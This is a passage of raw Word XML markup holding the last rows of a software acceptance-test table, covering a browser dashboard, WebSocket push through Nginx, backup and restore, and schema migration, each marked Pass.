              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 200, %PDF header</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BEDD4C7" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Dashboard in a real browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">all pages incl. detail pages and 404</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">No errors</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">0 console errors, 0 failed API calls</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BEDD4C7" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">WebSocket live push</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/ws through Nginx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Status live; events relayed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Live; test_websocket_relays_live_events passed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BEDD4C7" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Backup and restore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">once, verify, restore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Checksums OK; counts unchanged</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Verified; event and detection counts identical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="2BEDD4C7" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="380" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Schema auto-migration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">existing v0.6 and SQL_ASCII databases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Schema up to date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Migrated in place</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:sectPr w:rsidR="005C6601" w:rsidRPr="005C6601" w:rsidSect="005C6601">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1440" w:right="1080" w:bottom="1440" w:left="144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2A78DD3" w14:textId="77777777" w:rsidR="00082B0D" w:rsidRDefault="00082B0D" w:rsidP="00C05C1F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="62F9DB33" w14:textId="77777777" w:rsidR="00082B0D" w:rsidRDefault="00082B0D" w:rsidP="00C05C1F">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Times">
    <w:panose1 w:val="02020603050405020304"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E0002AFF" w:usb1="C0007841" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Arial">
